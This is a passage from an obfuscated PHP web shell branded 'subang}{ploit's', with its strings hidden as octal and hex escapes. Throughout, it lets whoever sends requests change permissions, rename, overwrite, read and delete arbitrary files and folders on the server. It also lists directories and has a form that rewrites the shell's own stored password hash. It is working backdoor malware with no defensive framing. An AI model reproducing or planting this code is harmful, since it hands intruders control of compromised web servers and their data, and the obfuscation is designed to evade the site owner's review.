"\74\142\162\40\x2f\76\x3c\x62\x72\x20\57\x3e"; if ($_POST["\157\160\164"] == "\x63\150\155\157\144") { if (isset($_POST["\160\145\x72\155"])) { if (chmod($_POST["\x70\141\x74\x68"], $_POST["\160\x65\x72\x6d"])) { echo "\x3c\x66\157\x6e\164\x20\143\157\154\x6f\x72\x3d\42\147\162\145\x65\156\x22\x3e\123\165\143\143\x65\163\163\x20\103\x68\x61\156\147\145\x20\120\145\162\155\x69\163\x73\151\157\156\x3c\x2f\x66\157\x6e\x74\76\x3c\142\162\40\x2f\76"; } else { echo "\74\x66\157\x6e\164\x20\x63\x6f\154\x6f\x72\75\42\162\x65\x64\x22\x3e\x46\141\151\x6c\145\x64\x20\x43\x68\x61\x6e\x67\x65\x20\x50\145\162\x6d\151\163\163\x69\x6f\156\x3c\57\146\157\x6e\x74\76\74\x62\x72\x20\57\76"; } } echo "\74\x66\157\162\155\40\x6d\145\x74\150\157\x64\x3d\42\120\117\x53\x54\42\x3e\12\40\40\x20\x20\x20\x20\40\40\120\145\x72\155\x69\x73\x73\151\x6f\156\40\72\40\74\x69\156\160\x75\164\x20\x6e\141\x6d\145\75\x22\160\145\x72\155\42\x20\164\x79\160\x65\x3d\x22\164\x65\x78\x74\x22\40\x73\x69\172\145\75\x22\x34\42\40\x76\141\x6c\x75\x65\75\42" . substr(sprintf("\45\x6f", fileperms($_POST["\x70\141\x74\x68"])), -4) . "\x22\40\x2f\x3e\xa\40\x20\x20\x20\40\40\x20\x20\74\x69\156\160\x75\164\x20\164\x79\x70\145\x3d\x22\150\151\x64\x64\x65\156\x22\x20\156\x61\x6d\x65\x3d\42\160\x61\164\x68\x22\x20\166\141\x6c\x75\145\x3d\x22" . $_POST["\160\141\164\x68"] . "\x22\x3e\xa\x20\x20\40\40\x20\x20\x20\x20\x3c\x69\156\160\165\x74\40\164\171\x70\145\75\x22\x68\151\x64\x64\x65\156\x22\x20\156\x61\x6d\x65\75\x22\x6f\160\x74\x22\40\166\x61\154\x75\x65\x3d\x22\x63\x68\155\157\144\x22\x3e\12\40\x20\40\x20\40\x20\40\x20\74\x69\156\x70\165\164\x20\164\x79\x70\x65\75\42\163\165\x62\x6d\x69\164\x22\x20\x76\141\x6c\x75\x65\x3d\x22\x47\157\42\x20\57\x3e\12\40\x20\x20\40\40\40\40\x20\74\57\x66\x6f\162\155\x3e"; } elseif ($_POST["\x6f\x70\164"] == "\162\145\156\x61\155\145") { if (isset($_POST["\x6e\145\167\x6e\x61\x6d\145"])) { if (rename($_POST["\x70\x61\x74\150"], $path . "\57" . $_POST["\156\x65\167\x6e\141\155\x65"])) { echo "\x3c\x66\157\156\164\x20\x63\157\x6c\157\162\x3d\42\147\x72\145\145\156\42\76\123\165\x63\x63\x65\163\x73\x3c\x2f\x66\x6f\156\164\76\74\x62\x72\40\x2f\x3e"; } else { echo "\x3c\146\x6f\156\x74\40\x63\157\154\x6f\x72\75\42\162\145\144\x22\76\106\x61\151\154\x65\x64\74\57\146\x6f\x6e\x74\x3e\74\142\x72\x20\x2f\76"; } $_POST["\x6e\x61\x6d\x65"] = $_POST["\156\x65\167\156\x61\x6d\145"]; } echo "\74\146\157\x72\x6d\x20\x6d\145\x74\x68\x6f\144\75\42\x50\x4f\123\x54\x22\76\12\x20\40\x20\40\x20\40\40\x20\x4e\145\x77\40\116\141\x6d\x65\x20\72\40\x3c\x69\x6e\x70\165\x74\x20\156\141\x6d\x65\75\x22\156\145\x77\x6e\x61\x6d\145\x22\x20\164\x79\160\x65\x3d\42\164\145\x78\x74\42\x20\163\x69\x7a\145\x3d\x22\62\60\42\x20\166\141\x6c\165\145\75\42" . $_POST["\156\x61\155\x65"] . "\42\40\x2f\x3e\12\x20\40\40\40\40\x20\40\40\74\x69\x6e\160\165\164\40\164\171\x70\x65\75\42\x68\151\144\144\145\x6e\42\x20\156\141\155\145\75\42\x70\x61\x74\x68\x22\40\166\141\x6c\x75\145\x3d\42" . $_POST["\160\141\164\x68"] . "\x22\76\12\x20\40\40\x20\x20\x20\x20\40\74\x69\156\160\x75\x74\x20\164\x79\x70\x65\75\42\x68\151\x64\x64\145\156\x22\40\156\141\155\145\x3d\42\x6f\160\164\42\40\x76\141\154\165\145\x3d\x22\162\145\156\141\155\145\x22\x3e\xa\x20\x20\40\40\40\40\x20\40\74\151\x6e\160\x75\x74\x20\x74\x79\160\x65\75\42\163\165\x62\x6d\x69\x74\42\x20\166\x61\x6c\x75\145\x3d\42\x47\157\x22\x20\x2f\76\12\x20\x20\40\x20\40\40\x20\40\74\57\x66\157\162\155\76"; } elseif ($_POST["\157\160\x74"] == "\145\144\151\x74") { if (isset($_POST["\x73\x72\x63"])) { $fp = fopen($_POST["\160\x61\164\150"], "\167"); if (fwrite($fp, $_POST["\x73\162\x63"])) { echo "\74\x66\x6f\156\164\40\143\x6f\154\x6f\x72\75\x22\x67\162\145\145\x6e\x22\x3e\x53\x75\x63\143\145\163\163\x3c\x2f\x66\157\156\164\x3e\x3c\142\162\x20\57\x3e"; } else { echo "\x3c\146\x6f\x6e\x74\x20\x63\157\x6c\x6f\x72\x3d\x22\x72\145\144\42\x3e\106\x61\151\x6c\145\x64\74\57\146\x6f\156\x74\76\74\x62\162\40\x2f\76"; } fclose($fp); } echo "\74\146\x6f\162\155\x20\x6d\145\x74\150\157\144\75\42\x50\x4f\123\x54\42\x3e\xa\x20\x20\x20\40\x20\40\40\x20\x3c\x74\145\170\164\x61\162\x65\x61\x20\143\157\154\163\75\x38\x30\40\162\x6f\x77\x73\75\x32\x30\x20\156\x61\155\x65\75\x22\163\x72\x63\x22\x3e" . htmlspecialchars(file_get_contents($_POST["\x70\141\x74\150"])) . "\x3c\x2f\x74\x65\170\164\x61\162\145\141\x3e\x3c\x62\162\x20\x2f\76\12\x20\x20\40\x20\x20\x20\40\x20\74\x69\x6e\160\x75\x74\x20\x74\x79\x70\x65\75\x22\x68\151\x64\144\145\156\x22\40\156\x61\155\x65\75\42\160\141\x74\x68\x22\x20\x76\141\154\165\x65\x3d\x22" . $_POST["\160\141\164\x68"] . "\x22\76\xa\x20\x20\x20\x20\40\x20\x20\40\74\x69\x6e\160\x75\164\x20\164\x79\160\x65\x3d\42\150\151\144\x64\145\156\42\40\156\141\x6d\145\75\42\x6f\160\x74\42\x20\166\x61\154\x75\x65\75\x22\x65\144\x69\x74\x22\x3e\xa\40\x20\x20\40\x20\x20\x20\x20\74\x69\156\160\165\164\40\164\171\x70\x65\75\x22\x73\165\x62\x6d\x69\x74\x22\x20\166\141\x6c\165\145\x3d\x22\107\x6f\x22\40\x2f\76\12\40\x20\40\x20\40\x20\x20\40\x3c\x2f\x66\157\162\155\x3e"; } echo "\74\57\143\x65\x6e\164\145\162\x3e"; } else { echo "\74\142\x72\40\57\x3e\74\143\x65\x6e\164\145\162\76"; if (isset($_GET["\157\160\164\x69\x6f\156"]) && $_POST["\157\x70\164"] == "\144\x65\x6c\145\164") { if ($_POST["\164\171\x70\145"] == "\144\x69\x72") { if (rmdir($_POST["\x70\141\x74\x68"])) { echo "\74\146\157\x6e\164\40\143\x6f\x6c\157\x72\x3d\42\147\x72\x65\x65\156\42\76\123\x75\x63\x63\145\x73\x73\x3c\x2f\x66\x6f\156\164\76\x3c\142\162\40\57\x3e"; } else { echo "\74\x66\x6f\x6e\x74\40\143\157\x6c\x6f\162\x3d\x22\162\x65\x64\42\76\106\141\151\x6c\x65\144\74\x2f\146\x6f\x6e\164\x3e\74\142\162\x20\57\x3e"; } } elseif ($_POST["\x74\171\x70\x65"] == "\x66\x69\x6c\145") { if (unlink($_POST["\160\141\x74\x68"])) { echo "\x3c\x66\x6f\156\x74\40\x63\x6f\154\x6f\x72\x3d\x22\147\x72\145\145\156\x22\x3e\123\165\143\143\x65\x73\x73\74\57\x66\157\x6e\x74\76\74\142\x72\x20\57\76"; } else { echo "\x3c\146\x6f\156\x74\40\143\157\154\x6f\162\x3d\x22\x72\145\144\42\76\106\x61\151\x6c\x65\x64\x3c\57\146\x6f\x6e\164\x3e\x3c\142\x72\40\x2f\x3e"; } } } echo "\x3c\x2f\x63\145\x6e\x74\145\162\x3e"; if (!isset($_GET["\x78"])) { $scandir = scandir($path); echo "\x3c\144\x69\x76\40\x69\144\x3d\x22\143\157\156\x74\145\156\x74\42\76\x3c\164\x61\142\154\x65\40\167\151\x64\x74\150\x3d\x22\x37\60\60\x22\40\x62\x6f\x72\x64\x65\162\75\42\x30\x22\x20\x63\x65\154\154\160\x61\144\144\x69\156\147\75\x22\x33\42\x20\x63\x65\x6c\x6c\x73\x70\x61\x63\x69\156\147\75\x22\61\x22\x20\141\154\151\x67\156\x3d\x22\x63\x65\x6e\x74\x65\162\42\76\xa\x20\40\x20\x20\74\164\162\40\143\154\141\x73\x73\x3d\42\146\x69\x72\163\164\x22\76\12\40\40\x20\x20\40\40\40\x20\x3c\x74\x64\x3e\x3c\x63\145\x6e\x74\145\x72\76\74\146\157\x6e\x74\x20\x63\157\154\x6f\162\x3d\42\162\x65\x64\42\76\104\151\162\x3c\57\x66\157\156\x74\76\74\57\143\x65\156\x74\x65\x72\x3e\x3c\x2f\164\144\76\xa\40\40\x20\x20\x20\40\x20\x20\x3c\x74\x64\x3e\74\x63\x65\x6e\164\x65\162\x3e\74\146\157\x6e\164\x20\x63\157\154\x6f\x72\x3d\x22\x72\x65\144\x22\76\123\x69\x7a\x65\x3c\x2f\x66\x6f\x6e\x74\x3e\74\57\143\x65\x6e\x74\145\x72\76\x3c\x2f\x74\144\x3e\xa\x20\40\40\x20\x20\40\x20\40\x3c\x74\144\x3e\74\x63\145\x6e\x74\x65\162\76\x3c\x66\157\156\164\40\x63\x6f\x6c\x6f\x72\75\x22\162\x65\x64\x22\76\x50\145\x72\x6d\x69\163\x73\x69\x6f\156\x73\x3c\x2f\146\157\x6e\x74\76\x3c\57\x63\145\156\164\145\x72\x3e\x3c\x2f\x74\x64\x3e\12\x20\x20\40\40\40\x20\x20\x20\74\164\144\x3e\x3c\x63\x65\x6e\164\145\162\76\x3c\x66\157\156\164\x20\x63\x6f\x6c\157\162\75\x22\162\x65\x64\x22\x3e\x53\x65\164\x74\x69\x6e\x67\x3c\x2f\146\x6f\156\164\x3e\x3c\57\x63\x65\x6e\x74\x65\x72\76\74\x2f\x74\x64\x3e\xa\x20\40\40\x20\x3c\57\x74\162\76"; foreach ($scandir as $dir) { if (!is_dir("{$path}\57{$dir}") || $dir == "\56" || $dir == "\56\x2e") { continue; } $dirlink = "{$path}\x2f{$dir}"; echo "\74\x74\162\x3e\12\40\x20\x20\40\40\x20\x20\40\x3c\x74\x64\76\x3c\x61\40\150\162\145\146\75\x22\77\x70\141\x74\x68\x3d{$dirlink}\x22\76{$dir}\x3c\x2f\x61\76\74\57\x74\144\76\12\x20\40\40\40\40\40\40\40\74\x74\144\x3e\74\143\145\x6e\164\145\162\x3e\x2d\55\x3c\x2f\x63\x65\x6e\164\x65\162\76\74\57\x74\144\x3e\12\40\40\40\40\x20\x20\40\40\x3c\164\144\76\74\x63\x65\x6e\x74\145\162\x3e"; if (is_writable("{$path}\57{$dir}")) { echo "\x3c\146\x6f\x6e\164\40\143\157\154\x6f\162\x3d\42\x67\x72\145\x65\x6e\42\76"; } elseif (!is_readable("{$path}\x2f{$dir}")) { echo "\x3c\x66\x6f\156\x74\40\143\x6f\154\x6f\x72\x3d\x22\x72\145\144\x22\76"; } echo perms("{$path}\57{$dir}"); if (is_writable("{$path}\57{$dir}") || !is_readable("{$path}\x2f{$dir}")) { echo "\74\57\146\x6f\x6e\x74\x3e"; } echo "\x3c\57\x63\x65\156\x74\145\162\76\x3c\57\x74\144\x3e\xa\x20\x20\x20\40\x20\x20\40\40\74\164\144\x3e\74\x63\x65\x6e\164\145\x72\76\74\146\157\x72\155\40\x6d\145\164\150\157\144\x3d\42\x50\x4f\123\124\x22\40\x61\x63\x74\x69\x6f\x6e\x3d\x22\77\157\x70\x74\x69\x6f\x6e\46\x70\x61\164\x68\75{$pathen}\42\76\xa\x20\40\x20\x20\40\x20\40\x20\74\163\145\154\145\143\164\x20\156\x61\x6d\x65\75\42\157\x70\x74\42\76\12\x9\40\x20\x20\40\74\x6f\x70\164\151\x6f\x6e\x20\166\141\x6c\x75\145\x3d\42\42\76\123\x65\x6c\x65\x63\x74\x3c\x2f\157\x70\x74\151\x6f\156\x3e\12\x20\40\x20\40\x20\x20\40\40\74\x6f\x70\x74\x69\x6f\x6e\40\166\x61\x6c\x75\x65\75\x22\144\145\x6c\x65\x74\42\76\104\x65\x6c\x65\164\x65\x3c\57\157\x70\164\151\x6f\x6e\x3e\12\40\x20\x20\x20\40\x20\40\x20\x3c\x6f\x70\164\151\x6f\156\40\x76\141\x6c\165\145\x3d\x22\143\150\155\x6f\144\42\76\x43\x68\155\157\144\74\57\x6f\x70\164\x69\x6f\156\76\12\40\x20\x20\40\40\x20\x20\40\74\x6f\x70\x74\151\157\x6e\40\x76\141\154\165\145\x3d\x22\x72\x65\x6e\x61\155\x65\42\76\x52\145\156\x61\x6d\x65\74\57\157\160\x74\151\x6f\156\76\12\40\40\40\x20\40\x20\x20\40\74\x2f\163\145\154\145\143\164\76\12\40\40\x20\x20\40\x20\x20\x20\74\151\156\x70\165\x74\x20\164\x79\160\x65\75\x22\150\151\144\144\145\x6e\42\40\156\x61\155\145\x3d\x22\x74\171\x70\x65\42\x20\x76\x61\154\165\x65\75\x22\144\151\162\x22\x3e\xa\40\x20\x20\40\40\40\40\40\74\x69\156\160\x75\164\40\164\x79\160\145\75\x22\150\151\x64\x64\145\156\42\x20\156\x61\x6d\x65\75\x22\156\x61\155\x65\42\40\x76\x61\154\165\x65\75\42{$dir}\x22\x3e\xa\x20\40\40\x20\x20\x20\x20\40\x3c\151\156\x70\x75\x74\40\164\171\160\145\75\42\150\151\144\144\x65\156\42\40\x6e\141\x6d\x65\75\42\160\x61\164\x68\42\x20\166\x61\154\x75\x65\75\42{$path}\x2f{$dir}\42\x3e\12\x20\40\40\x20\x20\x20\x20\40\x3c\151\156\160\x75\x74\x20\x74\x79\x70\x65\75\42\163\165\x62\x6d\x69\x74\x22\40\x76\141\x6c\165\x65\x3d\42\76\x22\x20\x2f\76\12\40\40\40\40\x20\x20\40\x20\x3c\57\146\x6f\162\155\76\74\x2f\143\145\x6e\x74\145\x72\76\x3c\57\164\144\x3e\xa\x20\40\40\x20\40\x20\x20\40\x3c\x2f\164\162\x3e"; } echo "\74\164\162\x20\143\x6c\141\x73\163\x3d\42\146\x69\162\x73\164\x22\76\x3c\164\x64\x3e\x3c\x2f\x74\x64\76\74\164\144\x3e\74\x2f\x74\x64\76\74\164\144\76\74\x2f\x74\144\76\74\x74\144\x3e\x3c\57\164\144\x3e\x3c\57\164\162\76"; foreach ($scandir as $file) { if (!is_file("{$path}\x2f{$file}")) { continue; } $size = filesize("{$path}\57{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\x20\115\102"; } else { $size = $size . "\40\113\102"; } $filelink = "{$path}\57{$file}"; echo "\74\164\162\76\12\x20\x20\x20\40\x20\40\40\x20\x3c\164\x64\76\74\141\40\150\162\x65\x66\x3d\42\77\146\151\154\x65\163\x72\x63\x3d{$filelink}\46\x70\141\x74\150\75{$pathen}\42\76{$file}\74\x2f\x61\76\x3c\57\x74\x64\76\xa\x20\40\x20\x20\40\40\x20\40\74\x74\144\x3e\x3c\143\x65\156\x74\x65\162\76" . $size . "\74\x2f\143\x65\156\164\x65\162\76\x3c\x2f\x74\144\x3e\xa\x20\x20\x20\x20\x20\40\40\40\74\164\144\x3e\74\x63\x65\x6e\164\145\162\x3e"; if (is_writable("{$path}\57{$file}")) { echo "\74\x66\157\x6e\x74\x20\x63\157\154\x6f\162\x3d\42\147\162\145\x65\x6e\x22\76"; } elseif (!is_readable("{$path}\57{$file}")) { echo "\x3c\146\157\x6e\x74\40\143\x6f\154\x6f\162\x3d\x22\162\145\x64\x22\76"; } echo perms("{$path}\x2f{$file}"); if (is_writable("{$path}\57{$file}") || !is_readable("{$path}\x2f{$file}")) { echo "\x3c\x2f\146\157\156\x74\76"; } echo "\74\57\143\x65\x6e\164\x65\162\76\x3c\57\164\x64\x3e\xa\40\40\x20\40\40\x20\x20\x20\x3c\x74\x64\76\74\x63\x65\156\x74\x65\162\76\x3c\146\157\x72\155\40\x6d\145\164\x68\157\x64\x3d\42\x50\117\x53\124\x22\x20\x61\143\164\151\x6f\156\75\x22\77\x6f\160\x74\151\157\156\46\x70\x61\x74\150\75{$pathen}\x22\x3e\xa\x20\40\x20\x20\40\x20\x20\x20\x3c\163\145\154\x65\x63\x74\40\x6e\141\x6d\145\75\42\x6f\x70\164\x22\76\xa\x9\40\x20\x20\x20\x3c\x6f\160\x74\151\x6f\156\x20\x76\141\x6c\165\145\75\42\42\x3e\123\x65\x6c\x65\143\164\x3c\57\x6f\x70\x74\151\x6f\156\76\xa\x20\x20\40\x20\40\40\40\x20\x3c\x6f\160\x74\151\157\x6e\40\166\x61\154\x75\x65\75\42\x64\145\x6c\145\164\42\x3e\x44\145\x6c\x65\x74\145\x3c\x2f\157\x70\164\x69\157\156\x3e\12\40\x20\40\40\40\40\40\x20\74\157\x70\164\x69\157\x6e\x20\166\x61\x6c\165\145\x3d\x22\143\150\155\x6f\144\x22\x3e\x43\x68\155\157\144\x3c\x2f\x6f\160\164\151\157\156\x3e\xa\40\40\40\x20\x20\40\x20\40\x3c\x6f\160\x74\151\x6f\156\x20\x76\x61\x6c\165\145\75\42\162\x65\x6e\141\155\145\x22\76\x52\145\156\141\155\x65\x3c\57\157\160\x74\151\x6f\156\x3e\xa\40\40\40\x20\x20\40\40\x20\x3c\x6f\x70\164\151\x6f\156\x20\x76\x61\154\165\145\x3d\42\x65\x64\151\164\x22\76\105\x64\x69\x74\x65\x20\106\151\x6c\145\x3c\x2f\157\160\x74\x69\157\x6e\x3e\12\40\x20\40\x20\x20\x20\40\x20\x3c\x2f\x73\145\154\x65\x63\x74\x3e\xa\x20\x20\40\40\40\40\40\x20\x3c\151\156\160\x75\x74\x20\x74\171\160\x65\75\42\150\151\x64\144\145\x6e\42\x20\x6e\x61\155\145\75\x22\164\171\x70\x65\x22\40\x76\141\154\x75\x65\x3d\x22\146\151\154\x65\42\76\12\40\x20\40\x20\40\40\x20\40\x3c\x69\156\x70\x75\164\x20\x74\x79\x70\x65\x3d\x22\x68\x69\x64\144\145\156\42\40\156\141\155\145\x3d\x22\x6e\141\x6d\145\42\40\166\x61\154\x75\x65\x3d\42{$file}\x22\x3e\xa\40\40\x20\40\40\x20\x20\40\74\x69\x6e\x70\x75\x74\x20\164\171\x70\145\75\x22\x68\151\144\x64\x65\156\x22\x20\x6e\x61\x6d\145\75\42\160\141\x74\x68\x22\x20\x76\141\x6c\165\145\75\42{$path}\57{$file}\x22\76\12\40\40\40\40\40\40\40\40\x3c\x69\x6e\160\165\x74\x20\x74\171\160\x65\x3d\42\163\165\142\x6d\151\164\42\x20\166\x61\x6c\x75\x65\75\42\76\x22\x20\x2f\x3e\xa\x20\x20\x20\x20\40\x20\40\x20\x3c\x2f\x66\157\x72\x6d\76\x3c\x2f\143\145\x6e\164\x65\162\76\x3c\57\x74\x64\76\xa\40\x20\x20\40\x20\x20\40\x20\74\x2f\x74\162\76"; } echo "\74\57\164\141\142\154\145\x3e\12\40\x20\x20\40\74\57\x64\151\x76\x3e"; } } if (isset($_GET["\x78"]) && $_GET["\170"] == "\x63\x68\141\156\x67\145\x70\141\163\163") { function fgc($file) { return file_get_contents($file); } function changepass($plain) { $newpass = md5($plain); $newpass = "\x24\x61\165\x74\x68\x5f\x70\x61\x73\163\40\x3d\40\42" . $newpass . "\42\73"; $con = fgc($_SERVER["\x53\103\x52\111\120\x54\137\x46\111\114\x45\116\x41\x4d\x45"]); $con = preg_replace("\x2f\x5c\44\141\x75\164\x68\137\160\x61\163\x73\134\40\52\x3d\x5c\x20\52\x5b\x22\134\x27\x5d\52\x28\x5b\x61\55\146\101\x2d\x46\x30\x2d\71\x5d\52\x29\x5b\42\134\47\x5d\52\73\57\151\x73", $newpass, $con); return file_put_contents($_SERVER["\123\103\122\111\120\124\137\x46\111\114\105\x4e\101\115\x45"], $con); } echo "\74\x63\145\x6e\164\145\162\x3e\74\x68\x31\76\x43\x68\x61\156\147\145\40\123\x68\x65\154\x6c\x20\120\x61\163\x73\167\157\x72\144\74\57\x68\x31\x3e\74\x2f\143\145\x6e\164\x65\x72\x3e"; echo "\74\x63\145\x6e\164\145\x72\76"; echo "\x3c\146\x6f\x72\155\x20\x61\143\164\151\x6f\x6e\75\x22\42\40\155\145\x74\x68\157\x64\x3d\x70\157\163\x74\40\x3e\74\164\141\142\x6c\x65\x3e"; echo "\x3c\164\162\x3e\74\x74\x64\x3e\x4e\x65\167\x20\120\x61\163\163\x77\157\x72\144\x3c\57\x74\144\76\74\x74\144\76\40\72\x20\x20\74\x69\156\160\165\164\x20\x74\x79\x70\x65\x3d\160\x61\163\x73\x77\x6f\x72\x64\x20\156\x61\x6d\145\x3d\x70\x61\x73\163\x31\40\x73\164\x79\154\x65\75\42\x62\x6f\162\x64\x65\162\55\162\x61\144\x69\165\163\x3a\x35\160\170\x3b\x22\x20\x2f\x3e\74\x2f\x74\x64\76\x3c\x2f\x74\x72\76"; echo "\74\164\162\x3e\74\164\144\x3e\x43\x6f\156\146\x69\x72\x6d\x20\x50\x61\163\x73\x77\157\x72\x64\74\x2f\x74\144\76\74\x74\144\76\40\72\x20\x20\74\151\x6e\160\165\164\40\x74\171\160\145\x3d\x70\141\163\163\x77\157\x72\144\x20\156\x61\155\145\x3d\160\141\163\163\x32\40\x73\164\x79\154\x65\75\42\142\157\162\x64\145\162\55\162\141\x64\x69\x75\x73\72\65\x70\x78\73\42\40\57\76\x3c\x2f\164\144\76\x3c\57\164\162\76"; echo "\x3c\x74\162\x3e\x3c\164\x64\x20\x63\157\154\x73\160\x61\156\x3d\62\76\74\151\156\160\x75\x74\40\x74\171\160\x65\x3d\x73\x75\142\155\x69\164\40\x76\141\x6c\165\x65\x3d\163\165\x62\155\x69\x74\x20\x6e\141\155\145\75\114\x20\163\164\171\154\x65\75\x22\142\x6f\162\x64\145\162\55\162\x61\x64\151\x75\163\x3a\x35\160\170\73\x77\x69\144\164\x68\72\61\60\60\45\42\57\x3e\74\x2f\164\x64\76\x3c\x2f\x74\x72\x3e\74\57\164\x61\x62\154\x65\x3e"; echo "\x3c\x2f\146\157\x72\155\76"; if (isset($_POST["\x4c"])) { if ($_POST["\160\141\163\163\61"] == $_POST["\x70\141\x73\163\x32"]) { if (changepass($_POST["\160\x61\x73\163\61"])) { echo "\74\163\143\162\x69\160\x74\x3e\x61\154\x65\x72\164\50\42\160\141\163\163\167\157\x72\144\40\x63\x68\x61\x6e\147\145\40\x73\165\143\143\x65\x73\x73\x66\x75\x6c\x6c\x79\42\x29\x3c\x2f\163\x63\x72\x69\x70\x74\76"; } else { echo "\74\x73\x63\x72\x69\160\164\76\x61\154\145\162\164\x28\42\160\141\x73\163\167\x6f\x72\x64\x20\143\150\x61\x6e\147\x65\40\146\141\151\154\145\x64\42\51\74\x2f\x73\143\x72\x69\x70\x74\x3e"; } } else { echo "\x3c\x73\143\x72\151\x70\164\x3e\141\154\x65\162\x74\x28\x22\160\141\x73\x73\167\x6f\x72\x64\40\x6e\x6f\x74\40\155\141\x74\143\150\42\51\x3c\57\x73\x63\x72\x69\160\x74\x3e"; } } } echo "\xa\x3c\x2f\x42\x4f\104\131\x3e\12\x3c\57\110\x54\x4d\x4c\x3e"; } else { lp(); } } else { echo lp(); } goto OozGD; OozGD: ?>
<center><br><font face="Iceland">copyright<font color="red">©</font>subang<font color="red">}{</font>ploit<font color="red">'</font>s</font><center></body></html>